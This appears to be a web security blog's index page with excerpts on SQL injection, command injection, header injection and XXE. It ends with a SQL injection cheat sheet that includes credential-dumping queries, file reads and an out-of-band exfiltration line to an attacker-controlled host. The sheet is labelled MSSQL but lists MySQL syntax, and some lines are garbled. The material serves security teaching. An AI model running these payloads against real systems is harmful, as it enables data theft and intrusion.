Categories
Web Application Security

SQL Injection: Out-of-Band Exploitation

This is an advanced SQL Injection (SQLi) post, if you’re new to SQLi maybe try this one first: Basics and Defence

Recently I had a fairly slow Time-Based SQL injection vulnerability, meaning that I could only pull a single character at a time with SQLmap and each character took around 10 seconds to retrieve. An alternative approach in this situation is to use out-of-band retrieval.  This is a concept that can be used when exploiting lots of vulnerabilities such as SQL Injection, Command Injection, Cross-site Scripting and XML External Entity Injection.

The idea is fairly simple, instead of capturing the data you would like to retrieve and extracting it through Boolean-logic you can request the system to transmit the data over a protocol such as HTTP, SMB or DNS.

Categories
Web Application Security

SQL Injection Filter Evasion with Sqlmap

Whenever I find a SQL injection vulnerability I always throw sqlmap at the injection point. It’s a simple, easy to use tools that will not only prove the vulnerability but allow you to extract data, gain command execution, and generally push further on with your penetration test. If I come across a filter or a web application firewall then I’ll habitually break out Burp Suite and start working on filter evasion manually, however there’s often a simpler way.

Categories
Web Application Security

HTTP Header Injection

HTTP Header Injection vulnerabilities occur when user input is insecurely included within server responses headers. Specifically they are based around the idea that an attacker can cause the server to generate a response which includes carriage-return and line-feed characters (or %0D and %0A respectively in their URI encoded forms) within the server response header the attacker may be able to add crafted headers themselves. Header Injection can allow for attacks such as response splitting, session fixation, cross-site scripting, and malicious redirection.

Categories
Web Application Security

Introduction to SQLmap

I posted a while ago on the very basics of SQL Injection. Then after than I did a complete breakdown of the manual exploitation of SQL Injection. Armed with that post and a cheatsheet or two, you should be able to get knee deep in almost any injection point. However, the truth is that often these injection points can be exploited using free, publicly available tools such as SQLmap! SQL injection can be a time consuming thing to exploit, especially when it comes to blind or out-of-band injection! So why not take the path of least resistance and automate wherever you can.

Categories
Web Application Security

SQL Injection: Exploitation

Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise.

Categories
Web Application Security

Command Injection: The Good, the Bad and the Blind

Command Injection vulnerabilities are a class of application security issue where an attacker can cause the application to execute an underlying operating system command. For that reason it’s generally a high impact issue. It can be exploited simply by chaining commands along with the expected input by using shell control characters such as:

 ` & or |


Developers have a variety of reasons why they might want their web applications to execute underlying operating system commands. One example could be an application that allows a user to check if a host is online by pinging its IP address. The URL for this function could look something like this:

Categories
Web Application Security

SQL Injection: Basics and Defence

Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host/network compromise.

Categories
Web Application Security

XXE: XML External Entity Injection

Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it! XXE is a vulnerability in the way that XML parses handle user input and if an attacker is able to enter arbitrary or crafted data into an XML parser they may be able to inject entities and this could leave to file disclosure, denial-of-service attacks or in rare cases – code execution!

Categories
Web Application Security

SQL Injection Cheat Sheet: MSSQL

MSSQL
MySQL

Comments
#
/*
-- -
;%00


Version
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;


User details
user()
current_user()
system_user()
session_user()
SELECT user,password FROM mysql.user;


Database details
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;


Database credentials
SELECT host, user, password FROM mysql.user;


Server details
SELECT @@hostname;


Table Name
SELECT table_name FROM information_schema.tables;


Columns Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))


String Concatenation
CONCAT(foo, bar)

 
Conditionals
SELECT IF(1=1,'true','false');

 
Time-delay
Sleep(10)


Command Execution
http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html


"RunAs"
N/A


Read Files
SELECT LOAD_FILE('C:Windowswin.ini');


Out-of-Band Retrieval
SELECT LOAD_FILE(concat('\\',(SELECT 1), 'attacker.controlledserver.com\')));


Substrings
SELECT substr(‘Foobr’, 1, 1);


Retrieve Nth Line
SELECT * FROM table ORDER BY ID LIMIT 3,1

This article is part of a Series, there are more to read below!
Basics and Defence
Exploitation
Filter Evasion with SQLmap
MySQL Cheat Sheet
MSSQL Cheat Sheet
Out-of-band Exploitation